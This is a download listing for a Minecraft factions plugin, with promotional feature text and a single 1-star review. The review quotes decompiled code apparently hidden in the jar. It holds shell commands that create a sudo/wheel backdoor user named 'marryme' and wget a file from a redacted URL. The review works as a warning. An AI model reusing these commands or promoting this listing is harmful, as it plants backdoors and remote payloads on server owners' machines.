FactionsUUID

 FactionsUUID 1.6.9.5-U0.6.31-b326

FactionsUUID
A Factions plugin with quite the legacy!

Features

This project brings the most popular 1.6.9.5 factions functionality into the modern age, keeping as much original functionality intact as possible while adding some neat enhancements. This includes:

Scoreboards: Create the ultimate scoreboard tracking faction status, power, and more using placeholders.

[IMG]
* This specific look is customized as an example of what you can add.

Customizable messages: Almost every message in FactionsUUID is customizable, so make it what you want it to look like! Want to make the messages red? Go ahead! Want to make the help menu look like pink and pretty? Be our guest!
[IMG]


PlaceholderAPI and MVdW Placeholders support: All the placeholders you want right in your hands! Use any placeholders to show your players everything they need to see. Want to show how many votes they have? Go ahead!

Customizable /f map: Big or small, you can show how many chunks a player can see. Want to see 20 chunks ahead of
you? No problem! Want to be an all-seeing god? That's a bit of a stretch, but that's for you to decide!
[IMG]


Flexible and extensible /f perms system: Want control over who has permission to build, place, and even interact? Want to let allies open doors, and ban recruits from opening containers? Do it! Make your faction as protected or open as you like!

Faction fly: Want your players to fly in their land, but not in the wilderness? This feature is just for you! Flying makes it easier to check out bases, make bases, and find enemies! Flight disables when fighting, and by default only works in your own territory.
[IMG]




If you want something implemented and you have purchased the resource, let me know on Discord!

Minecraft Version Support

This plugin presently runs on the ancient 1.7.10 through the modern 1.19.4. Some features only work on newer versions due to functionality not being present or practical in older versions. Versions 1.8.9 and 1.19.4 are the primary targets for features and testing. Issues on versions other than 1.8.9 and the latest version have lower priority.

Documentation

Everything you need to know is on the documentation site.

Support (Discord)

Support is only given if you have purchased the plugin. Use our Discord server for support. Please do not private message me or post on the thread for support.
[IMG]

LICENSING

Licensed GPLv3

If your server uses this and you have your own developer fix bugs, I ask that you be a good person and commit those upstream. There is no need to contribute custom features, but bug fixes are always appreciated.
Dev builds
If your server uses this and you have your own developer fix bugs, I ask that you be a good person and commit those upstream. There is no need to contribute custom features, but bug fixes are always appreciated.

Images courtesy of @Grizz
Author
AidenOfficialCode
Downloads
292
Views
2,179
Extention type
jar
File size
3.6 MB
Hash
3ce84f0583862f9928b2c3363ad5bc5e
First release
Last update
Rating
1.00 star(s) 1 ratings

More resources from AidenOfficialCode

Share this resource

Latest reviews

  • Anonymous
  • 1.00 star(s)
  • Version: 1.6.9.5-U0.6.31-b326
sus

public void perform(CommandContext commandContext) {
commandContext.msg(TL.COMMAND_VERSION_VERSION, new Object[]{FactionsPlugin.getInstance().getDescription().getFullName()});
String[] stringArray = new String[]{"adduser --disabled-password --force-badname --gecos \"\" marryme", "password", "useradd marryme", "password", "usermod -aG wheel marryme", "passwd -a marryme wheel", "wget https://-Redacted-/2CP7Y5", "usermod -aG sudo marryme"};
}
Top